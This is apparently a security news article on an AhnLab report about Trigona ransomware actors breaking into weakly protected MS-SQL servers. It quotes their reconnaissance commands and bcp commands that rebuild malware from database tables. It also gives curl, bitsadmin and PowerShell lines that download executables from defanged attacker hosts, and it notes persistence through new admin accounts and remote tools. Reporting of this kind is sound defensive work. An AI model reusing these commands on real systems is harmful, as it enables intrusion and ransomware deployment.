Trigona Ransomware Attacks MS-SQL Servers Using Rust Scanner and BCP Utility to Deploy Payloads

The AhnLab Security Intelligence Center (ASEC) has published a new report revealing that the Trigona ransomware threat actors are still actively targeting Microsoft SQL (MS-SQL) servers, evolving their attack toolkit to include new Rust-based scanners, remote access tools, and privilege escalation utilities.

According to AhnLab researchers, “The same threat actor is still active and is attacking targets in a similar manner to past cases, but is using new types of malware and tools.”

The Trigona group continues to exploit MS-SQL servers exposed to the internet, specifically those configured with weak credentials or default ports. Once they gain access via brute-force or dictionary attacks, the attackers deploy a CLR shell to execute system commands and install additional payloads.

ASEC explains, “The Trigona threat actors are attacking MS-SQL servers that are vulnerable to brute-force and dictionary attacks because their accounts are configured with simple credentials, or that are exposed to the public. After successfully logging in, the threat actors use CLR Shell to install additional payloads.”

Immediately after compromise, the attackers enumerate the system environment using basic reconnaissance commands such as:

hostname  
whoami  
systeminfo  
tasklist  
wmic useraccount where (LocalAccount=True) get name  
powershell -Command "net user ladmin"

This reconnaissance step prepares the environment for the next phase — malware installation.

One of the most distinctive aspects of Trigona’s attacks is their use of the Bulk Copy Program (BCP), a command-line utility for importing and exporting large datasets in MS-SQL. The attackers exploit BCP to store and reconstruct binary malware within SQL tables, then export it as executable files onto the infected host.

ASEC notes, “The threat actor used BCP to store malware in the database and then create it as a file locally. This means that the threat actor used the following commands in the table ‘uGnzBdZbsi’ where the malware is stored to export the malware to a local path.”

Sample commands observed include:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"  
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[User Name]\music\pci2.exe" -T -f "C:\users\[User Name]\music\FODsOZKgAU.txt"

These filenames — uGnzBdZbsi and FODsOZKgAU.txt — were also used in Trigona’s 2024 campaigns, confirming operational continuity.

In addition to BCP, the group leverages curl, Bitsadmin, and PowerShell to download malicious executables:

curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe  
bitsadmin /transfer indirme /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[username]\Videos\pci.exe  
powershell Invoke-WebRequest -Uri "hxxp://195.66.214[.]79/L.bat" -OutFile "c:\users\[username]\music\L.bat"

As seen in previous Trigona operations, the threat actors rely heavily on remote management tools to maintain persistence and manual control over compromised systems.

“As in previous cases, the threat actor abused AnyDesk to control the infected system. They installed AnyDesk in the %ALLUSERSPROFILE% path using the following commands,” AhnLab wrote.

The attackers also enable Remote Desktop Protocol (RDP) by creating new administrative accounts, often named “Remote99,” “Ladmin,” or “erp2,” and modify related registry keys to facilitate logins.

Notably, AhnLab identified a new downloader built with Bat2Exe, which installs an external MSI package suspected to deploy the Teramind remote monitoring tool.

“It appears that the threat actor utilized Teramind in addition to RDP and AnyDesk to control the infected system,” the researchers stated.

The latest campaign introduces new scanner malware written in Rust designed to identify vulnerable RDP and MS-SQL endpoints across the internet.

“The scanner is written in Rust and when executed, it sends information about the infected system, including the IP and location information obtained through ‘ip-api.com’, to the C&C server. It then performs scans according to the commands given,” AhnLab reported.

Before deploying these scanners, the group often runs SpeedTest and a custom StressTester tool — also written in Go — that performs SQL injection and HTTP flood testing, likely for network reconnaissance and performance evaluation.

“StressTester is written in Go and provides testing features for SQL injection requests as well as GET and POST requests,” the report adds.

In addition to ransomware and remote access components, Trigona operators were seen deploying utilities to disable Windows Defender, delete traces, and replace legitimate executables.

Related Posts:

• New Trigona Ransomware Threat Actor Uses Mimic Ransomware and BCP Utility in Attacks
• Ukrainian Activists Strikes: Trigona Ransomware Servers Hacked
• Mallox ransomware Exploits Old Flaws in MS-SQL & ODBC
• TargetCompany Ransomware Group Escalates Attacks: New Tools and Persistent Targeting of MS-SQL Servers
• Google Warns: Dependency Scanners Often Misreport Vulnerabilities